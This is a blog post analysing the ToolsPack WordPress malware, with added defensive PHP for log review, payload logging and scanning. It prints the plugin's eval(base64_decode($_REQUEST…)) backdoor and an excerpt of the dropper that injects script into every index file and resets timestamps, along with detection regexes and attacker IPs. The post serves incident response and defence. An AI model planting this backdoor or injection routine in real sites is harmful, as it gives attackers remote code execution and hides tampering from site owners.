How do WordPress sites get ToolsPack malware? - Software, Website Design, Cordova/Memphis TN

How do WordPress sites get ToolsPack malware?

ToolsPack plugin is bad stuff…

 

Symptoms:

Your index.php file(s) get JavaScript with something like this at the top:

<script>if(window.document)aa=new RegExp('test','i').toString();aaa='/...

Then, after cleaning, it comes back. Plus you get blacklisted by Google.

How does your index.php file get overwritten? And once you fix it, how does the same file get replaced again? It is maddening.

Anyway – I don’t know where my client picked it up, but sitting there in the plugins directory, all pretty and capitalized, was

plugins/ToolsPack/

with one small file, toolspack.php, containing this (oh man):

$_REQUEST[e] ? eval( base64_decode( $_REQUEST[e] ) ) : exit;

Hmmm…

Checking the log files over a period of several days showed several different IP addresses hitting that toolspack.php:

83.69.224.223
87.118.108.202
78.29.15.137
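The log check described above, as an added example that is not part of the original post: a small PHP tally of which clients hit the dropped toolspack.php, run over constructed Apache combined-format lines. The three IPs are the ones quoted above; the timestamps, paths, status codes and user agents are made up.

```php
<?php
// Added example, not from the original post: count requests to the dropped
// toolspack.php per client IP from Apache "combined" access-log lines.
// The sample lines below are constructed.

declare(strict_types=1);

// combined format: host ident user [time] "METHOD path protocol" status bytes "referer" "agent"
const COMBINED_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)/';

function parse_line(string $line): ?array
{
    if (preg_match(COMBINED_RE, $line, $m) !== 1) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'path' => $m[4], 'status' => (int) $m[5]];
}

/**
 * Hits per IP on any request path containing $needle (default: the backdoor
 * file name), with the HTTP methods used and the first/last timestamp seen.
 */
function hits_by_ip(array $lines, string $needle = 'toolspack.php'): array
{
    $out = [];
    foreach ($lines as $line) {
        $r = parse_line($line);
        if ($r === null || stripos($r['path'], $needle) === false) {
            continue;
        }
        $ip = $r['ip'];
        if (!isset($out[$ip])) {
            $out[$ip] = ['count' => 0, 'methods' => [], 'first' => $r['time'], 'last' => $r['time']];
        }
        $out[$ip]['count']++;
        $out[$ip]['methods'][$r['method']] = true;
        $out[$ip]['last'] = $r['time'];
    }
    ksort($out);
    return $out;
}

// Constructed sample: three backdoor hits from the IPs quoted in the post, plus
// ordinary traffic that must not be counted.
$sample = [
    '83.69.224.223 - - [18/Feb/2012:02:11:09 -0600] "POST /wp-content/plugins/ToolsPack/toolspack.php HTTP/1.1" 200 5 "-" "Mozilla/4.0"',
    '66.249.71.5 - - [18/Feb/2012:03:40:12 -0600] "GET / HTTP/1.1" 200 18230 "-" "Googlebot/2.1"',
    '87.118.108.202 - - [20/Feb/2012:15:19:41 -0600] "POST /wp-content/plugins/ToolsPack/toolspack.php HTTP/1.1" 200 5 "-" "Mozilla/5.0"',
    '87.118.108.202 - - [20/Feb/2012:15:19:42 -0600] "GET /index.php HTTP/1.1" 200 18401 "-" "Mozilla/5.0"',
    '78.29.15.137 - - [21/Feb/2012:07:02:55 -0600] "GET /wp-content/plugins/ToolsPack/toolspack.php?e=ZXJyb3JfcmVwb3J0aW5nKDAp HTTP/1.1" 200 5 "-" "Mozilla/5.0"',
];

foreach (hits_by_ip($sample) as $ip => $h) {
    printf("%-16s %2d hit(s)  %-9s %s .. %s\n",
        $ip, $h['count'], implode(',', array_keys($h['methods'])), $h['first'], $h['last']);
}
```

Note what the access log can and cannot tell you: a GET carries the `e=` parameter in the query string, so it is visible in the log line, but a POST body is not logged at all. That is why the next step in the post instruments the PHP file itself to capture the payload.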

Seems the hackers are interested only in the base index.php and wp-admin/index.php.

Actually, as you will see later in the code, the hackers edit every index.php from the root path on down.

Hmmm…

Get rid of it? …Delete it? …Ha! NO! Let’s have some fun.

Besides, I still don’t know what other files and things they have… Let’s see what it does. So I edited their ToolsPack: defanged it and logged their owned stuff:

I logged the date/time, IP address and payload:

February 20, 2012, 3:19 pm - 87.118.108.202 -  - ZXJyb3JfcmVwb3J0aW5nK... Long Block of junk --
Why hide it with base64?
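One way to do the defanging and logging the author describes, written here as an added example and not the author's actual edited file: the eval() is removed entirely, and the handler only records the timestamp, client IP, request method, a hash of the decoded payload, its first line, and the raw base64 as received, then answers 403. The log file location, the constructed request at the bottom and the `record_payload` function name are assumptions.

```php
<?php
// Added example, not the author's actual edited file: a "defanged" toolspack.php.
// The eval() is gone. Each request is only recorded (when, from where, what was
// sent) and answered with 403. The log path and the sample request are constructed.

declare(strict_types=1);

/**
 * Append one line to $logfile for a request carrying the "e" parameter and
 * return that line, or null if the parameter is absent. Fields are separated
 * by " | ": timestamp, client IP, method, SHA-256 of the decoded payload, its
 * first line (ASCII only, truncated), and the raw base64 as received.
 */
function record_payload(array $request, array $server, string $logfile): ?string
{
    if (!isset($request['e']) || !is_string($request['e'])) {
        return null;
    }
    $raw     = $request['e'];
    $decoded = base64_decode($raw, true);          // strict mode: non-base64 input fails

    $firstLine = $decoded === false ? '(not valid base64)' : explode("\n", $decoded, 2)[0];
    // Keep the log safe to read back: no control characters from attacker input.
    $firstLine = preg_replace('/[^\x20-\x7e]/', '?', substr($firstLine, 0, 80));
    $rawSafe   = preg_replace('/[^A-Za-z0-9+\/=]/', '?', $raw);

    $entry = implode(' | ', [
        date('c'),
        $server['REMOTE_ADDR'] ?? '-',
        $server['REQUEST_METHOD'] ?? '-',
        $decoded === false ? '-' : hash('sha256', $decoded),
        $firstLine,
        $rawSafe,
    ]) . "\n";

    file_put_contents($logfile, $entry, FILE_APPEND | LOCK_EX);
    return $entry;
}

// In the live, defanged file the body reduces to these three lines
// (the log path is a placeholder; keep it outside the web root):
//   record_payload($_REQUEST, $_SERVER, '/path/outside/webroot/toolspack-payloads.log');
//   http_response_code(403);
//   exit;
// Here a constructed request exercises the function without a web server.
$log         = sys_get_temp_dir() . '/toolspack-payloads.log';
$fakeRequest = ['e' => base64_encode("error_reporting(0);\n// constructed stand-in for the rest of the payload")];
$fakeServer  = ['REMOTE_ADDR' => '87.118.108.202', 'REQUEST_METHOD' => 'POST'];
echo record_payload($fakeRequest, $fakeServer, $log);
```

The raw base64 is kept verbatim so each capture can be decoded and diffed later, and the hash makes it easy to see whether successive hits carry the same payload or a new one. Once enough has been captured to know what else on the site needs cleaning, the plugin directory goes.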

Base64-decoding it shows how they overwrite the file:

Full source truncated; you get the idea. (BTW, nice indenting, for a virus…)

1) Get the starting root directory ($_SERVER[DOCUMENT_ROOT]) and save the payload in a variable named $iframe…

2) Then loop through every directory below it and look for files whose names start with “index.”

3) Read the file contents and strip any <script> block already at the top of the file:

4) Now insert the payload from above at the top and write the file back…

5) Finally, cover their tracks by resetting the file’s modification time to the original… really evil

 

// 1) starting directory and the payload to prepend
error_reporting(0);
$dirs[] = $dir = "$_SERVER[DOCUMENT_ROOT]";
$iframe = "<script>if(window.document)aa=/s/g.exec(\"s\").index+[];aaa='0'...

// 2) (the directory walk is omitted from this excerpt)
   if ( eregi("^index\.", $file) )
      {
        // 3) read the file and strip any <script> block already at the top
        $file_content = file_get_contents("$key/$file");
        $file_content = preg_replace("/^<script>(.*)<\/script>/iU", "", $file_content);

        // 4) write the payload followed by the original contents
        $fp = fopen("$key/$file", "wb");
        if (fwrite($fp, $iframe.$file_content))
            $success += 1;
        fclose($fp);

        // 5) put the original modification time back
        touch("$key/$file", $old_time);
      }
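A read-only scanner for the two artefacts described in steps 1 to 5 and in the backdoor one-liner earlier, added here as an example that is not code from the post: it walks a directory tree, flags any index.* file that starts with a <script> block and any .php file containing the eval(base64_decode($_REQUEST…)) pattern, and records a SHA-256 of each hit instead of trusting the modification time, because step 5 resets that with touch(). The demo tree in the system temp directory, its file contents and the faked 2011-01-01 mtime are constructed.

```php
<?php
// Added example, not code from the original post: a read-only scanner for the
// two ToolsPack artefacts described above (the eval/base64 backdoor and the
// <script> block prepended to index.* files). It only reports; it never writes
// to the files it inspects. The demo tree and its contents are constructed.

declare(strict_types=1);

// The backdoor feeds base64-decoded request input straight into eval().
const BACKDOOR_RE = '/\beval\s*\(\s*base64_decode\s*\(\s*\$_(REQUEST|POST|GET|COOKIE)\b/i';

// The dropper prepends "<script>...</script>" to each index.* it finds, so a
// file that *starts* with a script block rather than "<?php" is suspect. This
// is the same anchored pattern the dropper itself uses to strip its last copy.
const INJECT_RE = '/^<script>(.*)<\/script>/iU';

function is_injected_index(string $content): bool
{
    return preg_match(INJECT_RE, $content) === 1;
}

function has_eval_backdoor(string $content): bool
{
    return preg_match(BACKDOOR_RE, $content) === 1;
}

/** Walk $root; return one ['path','kind','sha256','mtime'] entry per suspicious file. */
function scan_tree(string $root): array
{
    $findings = [];
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iter as $file) {
        if (!$file->isFile()) {
            continue;
        }
        $path    = $file->getPathname();
        $name    = $file->getFilename();
        $content = (string) file_get_contents($path);

        $kind = null;
        if (preg_match('/^index\./i', $name) === 1 && is_injected_index($content)) {
            $kind = 'injected-index';
        } elseif (preg_match('/\.php$/i', $name) === 1 && has_eval_backdoor($content)) {
            $kind = 'eval-backdoor';
        }
        if ($kind === null) {
            continue;
        }
        $findings[] = [
            'path'   => $path,
            'kind'   => $kind,
            'sha256' => hash('sha256', $content),
            // Step 5 above resets the mtime with touch(), so it says nothing about
            // when the file really changed; compare the hash to a clean copy instead.
            'mtime'  => date('c', $file->getMTime()),
        ];
    }
    return $findings;
}

// --- Constructed demo tree in the temp directory ---------------------------
$root = sys_get_temp_dir() . '/toolspack-demo-' . bin2hex(random_bytes(4));
mkdir("$root/wp-admin", 0700, true);
mkdir("$root/wp-content/plugins/ToolsPack", 0700, true);

file_put_contents("$root/index.php", "<?php\n// clean file (constructed)\necho 'ok';\n");
file_put_contents("$root/wp-admin/index.php",
    "<script>/* constructed stand-in for the injected payload */</script><?php\necho 'admin';\n");
file_put_contents("$root/wp-content/plugins/ToolsPack/toolspack.php",
    '<?php' . "\n" . '$_REQUEST[e] ? eval( base64_decode( $_REQUEST[e] ) ) : exit;' . "\n");
// The same mtime trick the dropper uses, to show why mtime cannot be trusted.
touch("$root/wp-admin/index.php", strtotime('2011-01-01 00:00:00'));

foreach (scan_tree($root) as $f) {
    printf("%-15s %-45s sha256=%s mtime=%s\n",
        $f['kind'], substr($f['path'], strlen($root)), substr($f['sha256'], 0, 16), $f['mtime']);
}
```

Run against a real install, the two expected hits here (wp-admin/index.php as injected-index, the plugin file as eval-backdoor) would be replaced by whatever the tree actually contains; the 2011 mtime on the injected file shows up in the report exactly as the dropper intends, which is the point of printing the hash beside it.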

Posted in Wordpress
